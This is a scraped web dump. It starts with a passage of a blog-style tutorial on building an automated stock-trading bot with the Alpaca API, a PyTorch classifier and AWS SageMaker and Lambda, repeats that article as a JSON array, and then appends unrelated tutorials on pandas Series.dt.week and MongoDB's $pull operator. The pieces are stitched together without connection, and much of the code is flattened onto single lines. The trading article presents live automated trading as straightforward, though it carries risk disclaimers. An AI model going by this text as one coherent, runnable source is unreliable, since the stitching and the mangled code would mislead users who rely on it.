RSI, etc. Features have been created for each day. It can be easily created for hourly or any other timeframe. For some models which we are going to create, like LSTM or DRL, we might need to use the original dataset. Creating labels and features is where we have to create the logic to train our model. For now, I have used the logic from this paper. However, the labelling logic can be altered according to your needs. When performing unsupervised learning, you don’t need to create labels. Finally, the data needs to be scaled. Neural networks work better with scaled data. The first function will fit the scaler object using the train data, and the next function is used to scale any dataset.
# scale train and test data to [-1, 1] def transform_scale(train): # fit scaler print(len(train.columns)) scaler = MinMaxScaler(feature_range=(-1, 1)) scaler = scaler.fit(train) # transform train return scaler # scale train and test data to [-1, 1] def scale(dataset, scaler): # transform train dataset = scaler.transform(dataset) print(dataset.shape) return dataset Once we create the model, we have to prepare our data as a data loader. The below function will perform it. def _get_train_data_loader(batch_size, train_data): print("Get train data loader.") train_X = torch.from_numpy(train_data.drop(['labels'],axis=1).values).float() train_Y = torch.from_numpy(train_data['labels'].values).float() train_ds = torch.utils.data.TensorDataset(train_X,train_Y) return torch.utils.data.DataLoader(train_ds,shuffle=False, batch_size=batch_size) In this section, we are going to create different types of models. However, these models might not be perfect for a time series dataset. I wanted to show how to use a deep learning model with a complete pipeline. Fully connected Deep NN Here we will create a fully connected deep neural network. The model itself is not fancy, and I am not expecting it to perform well. Also, it is not an appropriate model for time series data. I am using this model just to use all our features and for the sake of simplicity. However, we are starting with a basic model to complete our pipeline. In the next section, I will show how to create other types of models. Our model.py looks like the one below. import torch.nn as nn import torch.nn.functional as F # define the network architecture class Net(nn.Module): def __init__(self, hidden_dim, dropout =0.3): super(Net, self).__init__() # Number of features self.fc1 = nn.Linear(427, hidden_dim) self.fc2 = nn.Linear(hidden_dim, hidden_dim*2) self.fc3 = nn.Linear(hidden_dim*2, hidden_dim) self.fc4 = nn.Linear(hidden_dim, 32) self.fc5 = nn.Linear(32, 3) self.dropout = nn.Dropout(dropout) def forward(self, x): out = self.dropout(F.relu(self.fc1(x))) out = self.dropout(F.relu(self.fc2(out))) out = self.dropout(F.relu(self.fc3(out))) out = self.dropout(F.relu(self.fc4(out))) out = self.fc5(out) return out After creating the model and required transformations, we will create our training loop (a sketch of it is included below). We are going to train our model in AWS Sagemaker. It is completely an optional step. The model can be trained locally, and the model output file can be used for predictions. If you train it in the cloud, the below code can be used for training. You also need an AWS account with the Sagemaker setup. If you need more info or help, please check my previous article, Train a GAN and generate faces using AWS Sagemaker | PyTorch setup section. Once you have all the required access, you can start fitting the model, as shown below. The command below will package all the necessary code with data, create an EC2 server with required containers, and train the model. from sagemaker.pytorch import PyTorch # Check the status of dataloader estimator = PyTorch(entry_point="train.py", source_dir="train", role=role, framework_version='1.0.0', train_instance_count=1, train_instance_type='ml.p2.xlarge', hyperparameters={ 'epochs': 2, 'hidden_dim': 32, },) Once you train the model, all the corresponding files will be in your S3 bucket. If you train your model locally, make sure you have the files in the corresponding S3 bucket location. As our next setup, we will deploy the model in AWS Sagemaker.
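Before the deployment details, here is a minimal sketch of the training loop referenced above, i.e. the core of the train.py entry point. It is an assumption-laden illustration rather than the author's original file: the model, the three-class output (buy, sell, hold) and the data loader helper come from the surrounding text, while the loss and optimizer choices are generic PyTorch defaults.
# illustrative train.py core loop (assumed shape, not the original file)
import torch
import torch.nn as nn
import torch.optim as optim

def train(model, train_loader, epochs, device):
    criterion = nn.CrossEntropyLoss()           # 3 classes: buy, sell, hold
    optimizer = optim.Adam(model.parameters())
    model.train()
    for epoch in range(epochs):
        total_loss = 0.0
        for batch_X, batch_Y in train_loader:
            batch_X = batch_X.to(device)
            batch_Y = batch_Y.to(device).long()  # class indices for CrossEntropyLoss
            optimizer.zero_grad()
            output = model(batch_X)              # logits of shape (batch, 3)
            loss = criterion(output, batch_Y)
            loss.backward()
            optimizer.step()
            total_loss += loss.item()
        print("Epoch: {}, Loss: {}".format(epoch + 1, total_loss / len(train_loader)))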
When deploying a PyTorch model in SageMaker, you are expected to provide four functions that the SageMaker inference container will use. model_fn: This function is the same function that we used in the training script, and it tells SageMaker how to load our model from the S3 bucket. input_fn: This function receives the raw serialized input sent to the model's endpoint, and its job is to de-serialize and make the input available for the inference code. Here we are going to create new data on a daily or hourly basis from the Alpaca API. output_fn: This function takes the output of the inference code, and its job is to serialize this output and return it to the caller of the model's endpoint. This is where we will have our logic to trade. predict_fn: The heart of the inference script, where the actual prediction is done; this is the function you will need to complete. Predictions will be made using the underlying data. It has three outcomes: Buy, Sell, and Hold. Below is the code to load the model and prepare the input data. Some points to be noted in the above code: The model and scaler object need to be in an S3 bucket. We have fetched data for many days or hours. It is required for LSTM type networks. Input content is the ticker symbol. We can tune the code for multiple symbols. In the below code section, we will create the output and predict functions. Some points to be noted in the above code: We have three classes: buy, sell or hold. Prediction needs to be one of these three. We need to focus on what is predicted and returned. Trade only if there are enough funds (or limited funds) and in limited quantity. Deployment is similar to training the model. from sagemaker.predictor import RealTimePredictor from sagemaker.pytorch import PyTorchModel class StringPredictor(RealTimePredictor): def __init__(self, endpoint_name, sagemaker_session): super(StringPredictor, self).__init__(endpoint_name, sagemaker_session, content_type='text/plain') model = PyTorchModel(model_data=estimator.model_data, role = role, framework_version='1.0.0', entry_point='predict.py', source_dir='../serve', predictor_cls=StringPredictor,) # Deploy the model on a cloud server predictor = model.deploy(initial_instance_count=1, instance_type='ml.m5.large') If you want to test the model, you can execute the below code. This says that the workflow is working, and you can output your predictions and trade stocks on the issued ticker. You can also get the endpoint name from the above code in the screenshot. Here we will complete the pipeline by creating the Lambda function and API. Create a Lambda function Create a lambda function in the AWS Lambda service. Remember to update the Endpoint name from the above screenshot. API Gateway From the AWS API Gateway services, create a REST API. Then give a name and create the API. Create a post and deploy from the Actions dropdown. Once you create it, the API is ready. You can use it in any UI if required. Finally, we have our REST endpoint, where we can create post requests. The endpoint can be tested with Postman or any other tool.
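Since the Lambda code itself is only shown as a screenshot in the original post, here is a hedged sketch of what such a handler could look like: it forwards the ticker to the SageMaker endpoint with boto3 and returns the response. The endpoint name and the 'ticker' event field are assumptions for illustration, not the author's original code.
# illustrative Lambda handler (assumed shape, not the original screenshot code)
import boto3

runtime = boto3.client('sagemaker-runtime')

def lambda_handler(event, context):
    # 'ticker' is an assumed field name in the incoming request
    ticker = event.get('ticker', 'AAPL')
    response = runtime.invoke_endpoint(
        EndpointName='YOUR-SAGEMAKER-ENDPOINT',  # replace with the deployed endpoint name
        ContentType='text/plain',
        Body=ticker)
    result = response['Body'].read().decode('utf-8')
    return {'statusCode': 200, 'body': result}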
If you don’t need an endpoint, you can schedule the lambda function by following this link. Cheers! You can see that the stock is bought and sold in the Alpaca portal. Predictions come from our model, and live data is fed into the model. We have trained a deep learning model and traded stocks using the output of the model in real-time. I still think there is room for improvement. I have used a deep neural network model here. You don’t need any model here. You can simply use your logic and create the pipeline. Better feature engineering and selection of those features can be performed. Different model architectures (like LSTM or DRL) need to be tested for time-series datasets. Backtesting needs to be performed on the training data. I have not covered backtesting in this article. The model can be retrained at frequent intervals. AWS Sagemaker provides an option without much hassle. If there is enough interest in the article, I will write a follow-up article on adding sentiment analysis about that particular stock in real-time with backtesting, and add other model architectures. Note from Towards Data Science’s editors: While we allow independent authors to publish articles in accordance with our rules and guidelines, we do not endorse each author’s contribution. You should not rely on an author’s works without seeking professional advice. See our Reader Terms for details. This article is entirely informative. None of the content presented in this notebook constitutes a recommendation of any particular security. All trading strategies are used at your own risk. Questions? Comments? Feel free to leave your feedback in the comments section. Check out other articles: 24x7 Live crypto trading | Buy Doge or any crypto using sentiment Make money using NFT + AI | GAN image generation Please subscribe to my newsletter to get the free working code for my articles and other updates.
[ { "code": null, "e": 483, "s": 172, "text": "If you have followed the stock market recently, you would have noticed the wild swings due to COVID-19. It goes up a day and goes down another day, which AI might easily predict. Won’t it be wonderful to have a stock trading agent with AI powers to buy and sell stocks without the need to monitor hour by hour?" }, { "code": null, "e": 954, "s": 483, "text": "So I decided to create a bot to trade. You would have seen many models that read from CSV’s and create a neural network, LSTM, or Deep Reinforcement Models(DRL). However, those models end up in a sandbox environment and are often tricky to use in a live environment. So I created the AI pipeline, which trades in real-time. After all, who does not want to make money in the stock market? So let’s get started. Below is the process we are going to follow to implement it." }, { "code": null, "e": 1172, "s": 954, "text": "Alpaca Broker accountAlpaca python package for API tradingCollect data, EDA, feature engineeringAI model and TrainingAWS Cloud to host code and get predictionsCreate a lambda function and APITrade stocks automatically" }, { "code": null, "e": 1194, "s": 1172, "text": "Alpaca Broker account" }, { "code": null, "e": 1232, "s": 1194, "text": "Alpaca python package for API trading" }, { "code": null, "e": 1271, "s": 1232, "text": "Collect data, EDA, feature engineering" }, { "code": null, "e": 1293, "s": 1271, "text": "AI model and Training" }, { "code": null, "e": 1336, "s": 1293, "text": "AWS Cloud to host code and get predictions" }, { "code": null, "e": 1369, "s": 1336, "text": "Create a lambda function and API" }, { "code": null, "e": 1396, "s": 1369, "text": "Trade stocks automatically" }, { "code": null, "e": 1774, "s": 1396, "text": "Currently, most brokerage firms offer zero trading fees. However, not all brokerage firms have an API option to trade. Alpaca provides free trading with python API to trade. Once you create an account, you will have paper trading and live trading options. We can test the strategies in paper trading and implement them in live trading. It is just a key change for live trading." }, { "code": null, "e": 1906, "s": 1774, "text": "If you can have a local environment, you can install the pip package. Once installed, you can select Paper trading or Live trading." }, { "code": null, "e": 1967, "s": 1906, "text": "Based on your selection, you can get the API and secret key." }, { "code": null, "e": 2009, "s": 1967, "text": "Now, these keys will be used in our code." }, { "code": null, "e": 2153, "s": 2009, "text": "import alpaca_trade_api as tradeapiapi = tradeapi.REST('xxxxxxxx', 'xxxxxxxxxx',base_url='https://paper-api.alpaca.markets', api_version='v2',)" }, { "code": null, "e": 2166, "s": 2153, "text": "Getting Data" }, { "code": null, "e": 2368, "s": 2166, "text": "One advantage of using Alpaca is you can get historical data from polygon API. The timeframe can be from minute, hour, day, etc. Once you create the data frame, the chart should be something like this." }, { "code": null, "e": 2388, "s": 2368, "text": "Feature Engineering" }, { "code": null, "e": 2661, "s": 2388, "text": "Like any data science project, we need to create features related to the dataset. Some part of the implementation was referred from this article. I have built around 430+ technical indicators from the above dataset. Features include momentum, trends, volatility, RSI, etc." }, { "code": null, "e": 2866, "s": 2661, "text": "Features have been created for each day. 
It can be easily created for hourly or any other timeframe. For some models which we are going to create, like LSTM, DRL we might need to use the original dataset." }, { "code": null, "e": 2996, "s": 2866, "text": "Creating labels and features is where we have to create logic to train our model. For now, I have used the logic from this paper." }, { "code": null, "e": 3135, "s": 2996, "text": "However, creating logic can be altered according to your needs. When performing unsupervised learning, you don’t require to create labels." }, { "code": null, "e": 3337, "s": 3135, "text": "Finally, the data needs to be scaled. Neural networks work better in scaled data. The first function will fit the scaler object using the train data, and the next function is used to scale any dataset." }, { "code": null, "e": 3735, "s": 3337, "text": "# scale train and test data to [-1, 1]def transform_scale(train): # fit scaler print(len(train.columns)) scaler = MinMaxScaler(feature_range=(-1, 1)) scaler = scaler.fit(train) # transform train return scaler# scale train and test data to [-1, 1]def scale(dataset, scaler): # transform train dataset = scaler.transform(dataset) print(dataset.shape) return dataset" }, { "code": null, "e": 3843, "s": 3735, "text": "Once we create the model, we have to prepare our data as a data loader. The below function will perform it." }, { "code": null, "e": 4236, "s": 3843, "text": "def _get_train_data_loader(batch_size, train_data): print(\"Get train data loader.\") train_X = torch.from_numpy(train_data.drop(['labels'],axis=1).values).float() train_Y = torch.from_numpy(train_data['labels'].values).float() train_ds = torch.utils.data.TensorDataset(train_X,train_Y)return torch.utils.data.DataLoader(train_ds,shuffle=False, batch_size=batch_size)" }, { "code": null, "e": 4449, "s": 4236, "text": "In this section, we are going to create different types of models. However, these models might not be perfect for a time series dataset. I wanted to show how to use a deep learning model with a complete pipeline." }, { "code": null, "e": 4473, "s": 4449, "text": "Fully connected Deep NN" }, { "code": null, "e": 4746, "s": 4473, "text": "Here we will create a fully connected deep neural network. The model itself is not fancy and I am not expecting to perform better. Also, it is not an appropriate model for time series data. I am using this model just to use all our features and for the sake of simplicity." }, { "code": null, "e": 4925, "s": 4746, "text": "However, we are starting with a basic model to complete our pipeline. In the next section, I will show how to create other types of models. Our model.py looks like the below one." }, { "code": null, "e": 5782, "s": 4925, "text": "import torch.nn as nnimport torch.nn.functional as F# define the CNN architectureclass Net(nn.Module): def __init__(self, hidden_dim, dropout =0.3): super(Net, self).__init__() # Number of features self.fc1 = nn.Linear(427, hidden_dim) self.fc2 = nn.Linear(hidden_dim, hidden_dim*2) self.fc3 = nn.Linear(hidden_dim*2, hidden_dim) self.fc4 = nn.Linear(hidden_dim, 32) self.fc5 = nn.Linear(32, 3) self.dropout = nn.Dropout(dropout) def forward(self, x): out = self.dropout(F.relu(self.fc1(x))) out = self.dropout(F.relu(self.fc2(out))) out = self.dropout(F.relu(self.fc3(out))) out = self.dropout(F.relu(self.fc4(out))) out = self.fc5(out) return out" }, { "code": null, "e": 5871, "s": 5782, "text": "After creating the model and required transformations, we will create our training loop." 
}, { "code": null, "e": 6116, "s": 5871, "text": "We are going to train our model in AWS Sagemaker. It is completely an optional step. The model can be trained locally, and the model output file can be used for predictions. If you train it in the cloud, the below code can be used for Training." }, { "code": null, "e": 6312, "s": 6116, "text": "You also need an AWS account with the Sagemaker setup. If you need more info or help, please check my previous article, Train a GAN and generate faces using AWS Sagemaker | PyTorch setup section." }, { "code": null, "e": 6533, "s": 6312, "text": "Once you have all the required access, you can start fitting the model, as shown below. The command below will package all the necessary code with data, create an EC2 server with required containers, and train the model." }, { "code": null, "e": 6995, "s": 6533, "text": "from sagemaker.pytorch import PyTorch#Check the status of dataloaderestimator = PyTorch(entry_point=\"train.py\", source_dir=\"train\", role=role, framework_version='1.0.0', train_instance_count=1, train_instance_type='ml.p2.xlarge', hyperparameters={ 'epochs': 2, 'hidden_dim': 32, },)" }, { "code": null, "e": 7179, "s": 6995, "text": "Once you train the model, all the corresponding files will be in your S3 bucket. If you train your model locally, make sure you have the files in the corresponding S3 bucket location." }, { "code": null, "e": 7378, "s": 7179, "text": "As our next setup, we will deploy the model in AWS Sagemaker. When deploying a PyTorch model in SageMaker, you are expected to provide four functions that the SageMaker inference container will use." }, { "code": null, "e": 7525, "s": 7378, "text": "model_fn: This function is the same function that we used in the training script, and it tells SageMaker how to load our model from the S3 bucket." }, { "code": null, "e": 7778, "s": 7525, "text": "input_fn: This function receives the raw serialized input sent to the model's endpoint, and its job is to de-serialize and make the input available for the inference code. Here we are going to create new data on a daily or hourly basis from Alpaca API." }, { "code": null, "e": 7983, "s": 7778, "text": "output_fn: This function takes the output of the inference code, and its job is to serialize this output and return it to the caller of the model's endpoint. This is where we will have our logic to trade." }, { "code": null, "e": 8206, "s": 7983, "text": "predict_fn: The heart of the inference script is where the actual prediction is done and is the function you will need to complete. Predictions will be made using underlying data. It has three outcomes Buy, Sell, and Hold." }, { "code": null, "e": 8269, "s": 8206, "text": "Below is the code to load the model and prepare the input data" }, { "code": null, "e": 8312, "s": 8269, "text": "Some points to be noted in the above code:" }, { "code": null, "e": 8529, "s": 8312, "text": "The model and scaler object need to be in an S3 bucket.We have fetched data for many days or hours. It is required for LSTM type networks.Input content is the ticker symbol. We can tune the code for multiple symbols." }, { "code": null, "e": 8585, "s": 8529, "text": "The model and scaler object need to be in an S3 bucket." }, { "code": null, "e": 8669, "s": 8585, "text": "We have fetched data for many days or hours. It is required for LSTM type networks." }, { "code": null, "e": 8748, "s": 8669, "text": "Input content is the ticker symbol. We can tune the code for multiple symbols." 
}, { "code": null, "e": 8827, "s": 8748, "text": "In the below code section, we will create the output and predict the function." }, { "code": null, "e": 8869, "s": 8827, "text": "Some points to be noted in the above code" }, { "code": null, "e": 9084, "s": 8869, "text": "We have three classes buy, sell or hold. Prediction needs to be one of these three.We need to focus on what is predicted and returned.Trade only if there are enough funds (or limited funds) and in limited quantity." }, { "code": null, "e": 9168, "s": 9084, "text": "We have three classes buy, sell or hold. Prediction needs to be one of these three." }, { "code": null, "e": 9220, "s": 9168, "text": "We need to focus on what is predicted and returned." }, { "code": null, "e": 9301, "s": 9220, "text": "Trade only if there are enough funds (or limited funds) and in limited quantity." }, { "code": null, "e": 9346, "s": 9301, "text": "Deployment is similar to training the model." }, { "code": null, "e": 10029, "s": 9346, "text": "from sagemaker.predictor import RealTimePredictorfrom sagemaker.pytorch import PyTorchModelclass StringPredictor(RealTimePredictor): def __init__(self, endpoint_name, sagemaker_session): super(StringPredictor, self).__init__(endpoint_name, sagemaker_session, content_type='text/plain')model = PyTorchModel(model_data=estimator.model_data, role = role, framework_version='1.0.0', entry_point='predict.py', source_dir='../serve', predictor_cls=StringPredictor,)# Deploy the model in cloud serverpredictor = model.deploy(initial_instance_count=1, instance_type='ml.m5.large')" }, { "code": null, "e": 10207, "s": 10029, "text": "If you want to test the model, you can execute the below code. This says that the workflow is working, and you can output your predictions and trade stocks on the issued ticker." }, { "code": null, "e": 10281, "s": 10207, "text": "You can also get the endpoint name from the above code in the screenshot." }, { "code": null, "e": 10353, "s": 10281, "text": "Here will complete the pipeline by creating the Lamda function and API." }, { "code": null, "e": 10378, "s": 10353, "text": "Create a Lambda function" }, { "code": null, "e": 10494, "s": 10378, "text": "Create a lambda function in the AWS lambda service. Remember to update the Endpoint name from the above screenshot." }, { "code": null, "e": 10506, "s": 10494, "text": "API Gateway" }, { "code": null, "e": 10593, "s": 10506, "text": "From AWS API gateway services, create a Rest API. Then give a name and create the API." }, { "code": null, "e": 10721, "s": 10593, "text": "Create a post and deploy from the Actions dropdown. Once you create it, the API is ready. You can use it in any UI if required." }, { "code": null, "e": 10943, "s": 10721, "text": "Finally, we have our Rest endpoint, where we can create post requests. The endpoint can be tested with Postman or any other tool. If you don’t need an endpoint, you can schedule the lambda function by following this link." }, { "code": null, "e": 11098, "s": 10943, "text": "Cheers! You can see that the stock is bought and sold in the Alpaca portal. Predictions are predicted from our model, and live data is fed into the model." }, { "code": null, "e": 11243, "s": 11098, "text": "We have trained a deep learning model and traded stocks using the output of the model in real-time. I still think there is room for improvement." }, { "code": null, "e": 11748, "s": 11243, "text": "I have used a deep neural network model here. You don’t need any model here. 
You can simply use your logic and create the pipeline.Better feature engineering and selection of those features can be performed.Different model architectures(like LSTM or DRL) need to be tested for time-series datasets.Backtesting needs to be performed on the training data. I have not covered backtesting in this article.The model can be retrained at frequent intervals. AWS Sagemaker provides an option without much hassle." }, { "code": null, "e": 11880, "s": 11748, "text": "I have used a deep neural network model here. You don’t need any model here. You can simply use your logic and create the pipeline." }, { "code": null, "e": 11957, "s": 11880, "text": "Better feature engineering and selection of those features can be performed." }, { "code": null, "e": 12049, "s": 11957, "text": "Different model architectures(like LSTM or DRL) need to be tested for time-series datasets." }, { "code": null, "e": 12153, "s": 12049, "text": "Backtesting needs to be performed on the training data. I have not covered backtesting in this article." }, { "code": null, "e": 12257, "s": 12153, "text": "The model can be retrained at frequent intervals. AWS Sagemaker provides an option without much hassle." }, { "code": null, "e": 12455, "s": 12257, "text": "If there is enough interest in the article, I will write a followup article on adding sentiment analysis about that particular stock in real-time with backtesting and add other model architectures." }, { "code": null, "e": 12755, "s": 12455, "text": "Note from Towards Data Science’s editors: While we allow independent authors to publish articles in accordance with our rules and guidelines, we do not endorse each author’s contribution. You should not rely on an author’s works without seeking professional advice. See our Reader Terms for details." }, { "code": null, "e": 12947, "s": 12755, "text": "This article is entirely informative. None of the content presented in this notebook constitutes a recommendation of any particular security. All trading strategies are used at your own risk." }, { "code": null, "e": 13026, "s": 12947, "text": "Questions? Comments? Feel free to leave your feedback in the comments section." }, { "code": null, "e": 13051, "s": 13026, "text": "Check out other articles" }, { "code": null, "e": 13165, "s": 13051, "text": "24x7 Live crypto trading | Buy Doge or any crypto using sentimentMake money using NFT + AI | GAN image generation" }, { "code": null, "e": 13231, "s": 13165, "text": "24x7 Live crypto trading | Buy Doge or any crypto using sentiment" }, { "code": null, "e": 13280, "s": 13231, "text": "Make money using NFT + AI | GAN image generation" }, { "code": null, "e": 13378, "s": 13280, "text": "Please subscribe to my newsletter to get the free working code for my articles and other updates." } ]
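Since the stock-trading article above flags backtesting as not covered, here is a deliberately tiny vectorised sketch of the idea: map the model's buy/sell/hold signals to positions and compare strategy returns with buy-and-hold. The signal encoding (+1 buy, -1 sell, 0 hold) and column names are assumptions for illustration only, not the author's code.
# toy backtest sketch: signals assumed encoded as +1 (buy), -1 (sell), 0 (hold)
import pandas as pd

def backtest(prices: pd.Series, signals: pd.Series) -> pd.DataFrame:
    daily_returns = prices.pct_change().fillna(0)
    # hold yesterday's position through today's return (avoids look-ahead bias)
    positions = signals.shift(1).fillna(0)
    strategy_returns = positions * daily_returns
    return pd.DataFrame({
        'buy_and_hold': (1 + daily_returns).cumprod(),
        'strategy': (1 + strategy_returns).cumprod(),
    })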
Python | Pandas Series.dt.week - GeeksforGeeks
20 Mar, 2019

Series.dt can be used to access the values of a Series as datetime-like objects and return several properties. The Pandas Series.dt.week attribute returns a NumPy array containing the week ordinal of the year for each entry in the underlying data of the given Series object.

Syntax: Series.dt.week
Parameter : None
Returns : numpy array

Example #1: Use the Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object.

# importing pandas as pd
import pandas as pd

# Creating the Series
sr = pd.Series(['2012-10-21 09:30', '2019-7-18 12:30', '2008-02-2 10:30',
                '2010-4-22 09:25', '2019-11-8 02:22'])

# Creating the index
idx = ['Day 1', 'Day 2', 'Day 3', 'Day 4', 'Day 5']

# set the index
sr.index = idx

# Convert the underlying data to datetime
sr = pd.to_datetime(sr)

# Print the series
print(sr)

Output :

Now we will use the Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object.

# return the week ordinal
# of the year
result = sr.dt.week

# print the result
print(result)

Output :

As we can see in the output, the Series.dt.week attribute has successfully accessed and returned the week ordinal of the year in the underlying data of the given Series object.

Example #2: Use the Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object.

# importing pandas as pd
import pandas as pd

# Creating the Series
sr = pd.Series(pd.date_range('2012-12-12 12:12', periods = 5, freq = 'M'))

# Creating the index
idx = ['Day 1', 'Day 2', 'Day 3', 'Day 4', 'Day 5']

# set the index
sr.index = idx

# Print the series
print(sr)

Output :

Now we will use the Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object.

# return the week ordinal
# of the year
result = sr.dt.week

# print the result
print(result)

Output :

As we can see in the output, the Series.dt.week attribute has successfully accessed and returned the week ordinal of the year in the underlying data of the given Series object.
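In recent pandas releases (1.1 and later), Series.dt.week is deprecated in favour of Series.dt.isocalendar().week. A minimal sketch of the modern equivalent, assuming the same sr series from Example #1:

# isocalendar() returns a DataFrame with year/week/day columns;
# its week column matches what dt.week used to return
result = sr.dt.isocalendar().week

# print the result
print(result)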
[ { "code": null, "e": 24844, "s": 24816, "text": "\n20 Mar, 2019" }, { "code": null, "e": 25092, "s": 24844, "text": "Series.dt can be used to access the values of the series as datetimelike and return several properties. Pandas Series.dt.week attribute return a numpy array containing the week ordinal of the year in the underlying data of the given series object." }, { "code": null, "e": 25115, "s": 25092, "text": "Syntax: Series.dt.week" }, { "code": null, "e": 25132, "s": 25115, "text": "Parameter : None" }, { "code": null, "e": 25154, "s": 25132, "text": "Returns : numpy array" }, { "code": null, "e": 25285, "s": 25154, "text": "Example #1: Use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(['2012-10-21 09:30', '2019-7-18 12:30', '2008-02-2 10:30', '2010-4-22 09:25', '2019-11-8 02:22']) # Creating the indexidx = ['Day 1', 'Day 2', 'Day 3', 'Day 4', 'Day 5'] # set the indexsr.index = idx # Convert the underlying data to datetime sr = pd.to_datetime(sr) # Print the seriesprint(sr)", "e": 25678, "s": 25285, "text": null }, { "code": null, "e": 25687, "s": 25678, "text": "Output :" }, { "code": null, "e": 25818, "s": 25687, "text": "Now we will use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object." }, { "code": "# return the week ordinal# of the yearresult = sr.dt.week # print the resultprint(result)", "e": 25909, "s": 25818, "text": null }, { "code": null, "e": 25918, "s": 25909, "text": "Output :" }, { "code": null, "e": 26227, "s": 25918, "text": "As we can see in the output, the Series.dt.week attribute has successfully accessed and returned the week ordinal of the year in the underlying data of the given series object. Example #2 : Use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object." }, { "code": "# importing pandas as pdimport pandas as pd # Creating the Seriessr = pd.Series(pd.date_range('2012-12-12 12:12', periods = 5, freq = 'M')) # Creating the indexidx = ['Day 1', 'Day 2', 'Day 3', 'Day 4', 'Day 5'] # set the indexsr.index = idx # Print the seriesprint(sr)", "e": 26501, "s": 26227, "text": null }, { "code": null, "e": 26510, "s": 26501, "text": "Output :" }, { "code": null, "e": 26641, "s": 26510, "text": "Now we will use Series.dt.week attribute to return the week ordinal of the year in the underlying data of the given Series object." }, { "code": "# return the week ordinal# of the yearresult = sr.dt.week # print the resultprint(result)", "e": 26732, "s": 26641, "text": null }, { "code": null, "e": 26917, "s": 26732, "text": "Output :As we can see in the output, the Series.dt.week attribute has successfully accessed and returned the week ordinal of the year in the underlying data of the given series object." }, { "code": null, "e": 26947, "s": 26917, "text": "Python pandas-series-datetime" }, { "code": null, "e": 26961, "s": 26947, "text": "Python-pandas" }, { "code": null, "e": 26968, "s": 26961, "text": "Python" }, { "code": null, "e": 27066, "s": 26968, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." 
}, { "code": null, "e": 27075, "s": 27066, "text": "Comments" }, { "code": null, "e": 27088, "s": 27075, "text": "Old Comments" }, { "code": null, "e": 27106, "s": 27088, "text": "Python Dictionary" }, { "code": null, "e": 27138, "s": 27106, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 27173, "s": 27138, "text": "Read a file line by line in Python" }, { "code": null, "e": 27195, "s": 27173, "text": "Enumerate() in Python" }, { "code": null, "e": 27225, "s": 27195, "text": "Iterate over a list in Python" }, { "code": null, "e": 27267, "s": 27225, "text": "Different ways to create Pandas Dataframe" }, { "code": null, "e": 27310, "s": 27267, "text": "Python program to convert a list to string" }, { "code": null, "e": 27347, "s": 27310, "text": "Create a Pandas DataFrame from Lists" }, { "code": null, "e": 27373, "s": 27347, "text": "Python String | replace()" } ]
How to remove element in a MongoDB array?
To remove an element from an array, use the update() method with $pull in MongoDB. The $pull operator removes from an existing array all instances of a value or values that match a specified condition.

Let us first create a collection with documents −

> db.demo541.insertOne({"software":{"services":["gmail","facebook","yahoo"]}});
{
   "acknowledged" : true,
   "insertedId" : ObjectId("5e8ca845ef4dcbee04fbbc11")
}
> db.demo541.insertOne({"software":{"services":["whatsapp","twitter"]}});
{
   "acknowledged" : true,
   "insertedId" : ObjectId("5e8ca85cef4dcbee04fbbc12")
}

Display all documents from the collection with the help of the find() method −

> db.demo541.find();

This will produce the following output −

{ "_id" : ObjectId("5e8ca845ef4dcbee04fbbc11"), "software" : { "services" : [ "gmail", "facebook", "yahoo" ] } }
{ "_id" : ObjectId("5e8ca85cef4dcbee04fbbc12"), "software" : { "services" : [ "whatsapp", "twitter" ] } }

Following is the query to remove an element from a MongoDB array −

> db.demo541.update({ _id: ObjectId("5e8ca845ef4dcbee04fbbc11") },
... { $pull: { 'software.services': "yahoo" }}
... );
WriteResult({ "nMatched" : 1, "nUpserted" : 0, "nModified" : 1 })

Display all documents from the collection again with the find() method −

> db.demo541.find();

This will produce the following output −

{ "_id" : ObjectId("5e8ca845ef4dcbee04fbbc11"), "software" : { "services" : [ "gmail", "facebook" ] } }
{ "_id" : ObjectId("5e8ca85cef4dcbee04fbbc12"), "software" : { "services" : [ "whatsapp", "twitter" ] } }
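$pull also accepts a condition rather than a single literal value. A minimal sketch, assuming the same demo541 collection as above, that removes several services at once with the $in operator −

> db.demo541.update({ _id: ObjectId("5e8ca845ef4dcbee04fbbc11") },
... { $pull: { 'software.services': { $in: ["gmail", "facebook"] } } }
... );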
[ { "code": null, "e": 1237, "s": 1062, "text": "To remove an element, update, and use $pull in MongoDB. The $pull operator removes from an existing array all instances of a value or values that match a specified condition." }, { "code": null, "e": 1287, "s": 1237, "text": "Let us first create a collection with documents −" }, { "code": null, "e": 1607, "s": 1287, "text": "db.demo541.insertOne({\"software\":{\"services\":[\"gmail\",\"facebook\",\"yahoo\"]}});{\n \"acknowledged\" : true,\n \"insertedId\" : ObjectId(\"5e8ca845ef4dcbee04fbbc11\")\n}\n> db.demo541.insertOne({\"software\":{\"services\":[\"whatsapp\",\"twitter\"]}});{\n \"acknowledged\" : true,\n \"insertedId\" : ObjectId(\"5e8ca85cef4dcbee04fbbc12\")\n}" }, { "code": null, "e": 1680, "s": 1607, "text": "Display all documents from a collection with the help of find() method −" }, { "code": null, "e": 1701, "s": 1680, "text": "> db.demo541.find();" }, { "code": null, "e": 1742, "s": 1701, "text": "This will produce the following output −" }, { "code": null, "e": 1962, "s": 1742, "text": "{ \"_id\" : ObjectId(\"5e8ca845ef4dcbee04fbbc11\"), \"software\" : { \"services\" : [ \"gmail\", \"facebook\", \"yahoo\" ] } }\n{ \"_id\" : ObjectId(\"5e8ca85cef4dcbee04fbbc12\"), \"software\" : { \"services\" : [ \"whatsapp\", \"twitter\" ] } } " }, { "code": null, "e": 2027, "s": 1962, "text": "Following is the query to remove an element in a MongoDB array −" }, { "code": null, "e": 2217, "s": 2027, "text": "> db.demo541.update({ _id: ObjectId(\"5e8ca845ef4dcbee04fbbc11\") },\n... { $pull: { 'software.services': \"yahoo\" }}\n... );\nWriteResult({ \"nMatched\" : 1, \"nUpserted\" : 0, \"nModified\" : 1 })" }, { "code": null, "e": 2290, "s": 2217, "text": "Display all documents from a collection with the help of find() method −" }, { "code": null, "e": 2311, "s": 2290, "text": "> db.demo541.find();" }, { "code": null, 